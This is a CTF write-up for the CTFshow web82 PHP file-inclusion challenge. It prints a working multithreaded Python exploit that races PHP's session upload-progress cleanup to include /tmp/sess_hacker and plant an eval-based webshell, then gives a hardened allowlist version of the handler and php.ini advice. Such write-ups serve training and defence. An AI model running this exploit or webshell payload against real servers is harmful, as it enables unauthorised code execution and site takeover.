CTFshow - WEB Beginner - File Inclusion web82
Challenge code
```php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
```
For php.ini, the default session.upload_progress configuration is all that is needed (the feature is enabled by default).
Sending a POST request in the following way makes PHP create the file /tmp/sess_hacker (the session id comes from the PHPSESSID cookie, and the PHP_SESSION_UPLOAD_PROGRESS form field is what triggers the write):
```python
session.post(url,
             cookies={'PHPSESSID': sessionid},
             data={'PHP_SESSION_UPLOAD_PROGRESS': "<?php file_put_contents('/var/www/html/shell.php','<?php eval($_POST[1]);?>');?>"},
             files={'file': ('1.jpg', fileBytes)})
```
Then including sess_hacker through the file-inclusion parameter writes the one-line webshell. Because PHP cleans up the session file very quickly after the upload finishes, the inclusion has to win a race against that cleanup, so the upload and the inclusion are repeated in parallel:
```python
import io
import requests
import threading

url = 'http://xxx.challenge.ctf.show/'
sessionid = 'hacker'

def write(session):
    # Keep uploading so the session file is continuously (re)created
    while True:
        fileBytes = io.BytesIO(b'a' * 1024 * 50)  # 50 KB
        session.post(url,
                     cookies={'PHPSESSID': sessionid},
                     data={'PHP_SESSION_UPLOAD_PROGRESS': "<?php file_put_contents('/var/www/html/shell.php','<?php eval($_POST[1]);?>');?>"},
                     files={'file': ('1.jpg', fileBytes)})

def read(session):
    while True:
        session.get(url + '?file=/tmp/sess_' + sessionid)  # trigger the file inclusion
        r = session.get(url + 'shell.php')  # check whether the webshell was written
        if r.status_code == 200:
            print('OK')

event = threading.Event()  # multithreading (the event is only set, never waited on)
session = requests.session()
for i in range(5):
    threading.Thread(target=write, args=(session,)).start()
for i in range(5):
    threading.Thread(target=read, args=(session,)).start()
event.set()
```
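The challenge handler fails because it blacklists substrings ("php", "data", ":", ".") while still passing attacker-controlled text to include(), so any readable path without those characters, such as a session file under /tmp, remains includable. The following is an added example of how the same page would be written defensively; it is not part of the challenge code, and the pages/ directory, the allowlist entries and the safe_include() name are assumptions made for this illustration.

```php
<?php
// Added example (not the original web82 code): a hardened replacement for
// the file-inclusion handler. User input is never used as a path; it is a
// key into a fixed allowlist, and the resolved file must sit under one
// directory that the application owns.

// Directory of includable pages; assumed layout for this example.
define('INCLUDE_DIR', __DIR__ . '/pages');

// Explicit allowlist: request key => file name (both assumed for the example).
$allowed = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

function safe_include(string $name, array $allowed): bool
{
    // Unknown key: refuse outright rather than trying to "clean" the input.
    if (!array_key_exists($name, $allowed)) {
        return false;
    }

    $base   = realpath(INCLUDE_DIR);
    $target = realpath(INCLUDE_DIR . '/' . $allowed[$name]);

    // realpath() returns false for missing files. Also confirm the resolved
    // path is still inside INCLUDE_DIR, so a misconfigured allowlist entry
    // (e.g. a symlink) cannot pull in /tmp/sess_* or any other file.
    if ($base === false || $target === false
        || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }

    include $target;
    return true;
}

if (isset($_GET['file'])) {
    if (!safe_include((string) $_GET['file'], $allowed)) {
        http_response_code(404);
        echo 'not found';
    }
} else {
    highlight_file(__FILE__);
}
```

Two configuration points complement the code change. If the application does not use the upload-progress feature, set `session.upload_progress.enabled = Off` in php.ini so an unauthenticated upload can no longer populate a session file with attacker-chosen text. Independently of that, keep the session save path outside any directory the web application is allowed to include from; the allowlist above makes that irrelevant for this handler, but it limits the blast radius of any other inclusion bug.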